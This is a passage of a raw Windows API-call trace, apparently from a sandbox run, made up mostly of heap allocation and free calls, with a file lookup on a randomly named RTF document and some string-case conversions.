0x43cac88 [0082.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0082.159] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0082.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0082.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0082.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0082.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0082.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0082.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0082.160] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0082.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0082.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0082.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0082.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0082.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0082.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0082.160] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\Zjnf2x96GL5i.rtf", lpFindFileData=0x144e970 | out: lpFindFileData=0x144e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23232a20, ftCreationTime.dwHighDateTime=0x1d5e463, ftLastAccessTime.dwLowDateTime=0xee16ecf0, ftLastAccessTime.dwHighDateTime=0x1d5ee4d, ftLastWriteTime.dwLowDateTime=0xee16ecf0, ftLastWriteTime.dwHighDateTime=0x1d5ee4d, nFileSizeHigh=0x0, nFileSizeLow=0x873a, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="Zjnf2x96GL5i.rtf", cAlternateFileName="ZJNF2X~1.RTF")) returned 0x41ac000 [0082.160] FindClose (in: hFindFile=0x41ac000 | out: hFindFile=0x41ac000) returned 1 [0082.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0082.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0082.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0082.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0082.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0082.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0082.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e38 [0082.160] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0082.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e38 | out: hHeap=0x1780000) returned 1 [0082.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0082.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0082.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28a0 [0082.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0082.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0082.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0082.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0082.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0082.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabc8 [0082.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0082.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0082.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0082.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0082.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0082.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0082.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0082.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0082.161] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0082.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0082.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0082.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0082.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0082.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0082.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0082.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0082.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0082.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c40 [0082.161] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0082.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c40 | out: hHeap=0x1780000) returned 1 [0082.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0082.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0082.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2870 [0082.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0082.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0082.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0082.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0082.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0082.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2750 [0082.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0082.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0082.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0082.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2760 [0082.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0082.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0082.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0082.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad78 [0082.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0082.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0082.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0082.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0082.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0082.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0082.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0082.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0082.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0082.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0082.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0082.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0082.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0082.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0082.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0082.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0082.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0082.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0082.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0082.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0082.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0082.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0082.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0082.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0082.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0082.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0082.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0082.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0082.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0082.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b98 [0082.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0082.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0082.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0082.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0082.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0082.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0082.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0082.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0082.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0082.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0082.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0082.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0082.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0082.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0082.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0082.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0082.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0082.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0082.163] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0082.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0082.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0082.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0082.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0082.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0082.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0082.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0082.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0082.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0082.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0082.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0082.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0082.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0082.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0082.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb318 [0082.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0082.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb198 [0082.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0082.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb120 [0082.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0082.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb258 [0082.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0082.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0082.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0082.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb090 [0082.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0082.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0082.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0082.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0082.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0082.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0082.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0082.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb228 [0082.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0082.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0082.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0082.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0082.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0082.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0082.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0082.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0082.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1e0 [0082.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0082.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0082.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0082.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0082.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0082.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0082.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0082.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0082.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0082.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0082.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0082.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2d0 [0082.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0082.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb300 [0082.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0082.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0082.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb210 [0082.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0082.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0082.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0082.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0082.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0082.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0082.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb270 [0082.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0082.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2e8 [0082.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0082.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4508 [0082.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0082.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb288 [0082.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0082.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0082.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0082.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb330 [0082.166] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0082.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0082.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0082.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0082.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0082.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0082.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0082.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0082.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0082.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0082.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0082.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0082.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0082.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0082.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0082.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0082.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0082.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0082.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0082.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0082.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0082.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0082.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0082.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0082.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0082.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0082.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0082.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0082.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0082.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0082.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0082.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0082.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0082.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0d8 | out: hHeap=0x1780000) returned 1 [0082.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0082.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0082.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0082.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0082.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0082.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0082.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0082.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0082.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0082.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0082.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0082.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0082.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0082.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb150 [0082.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 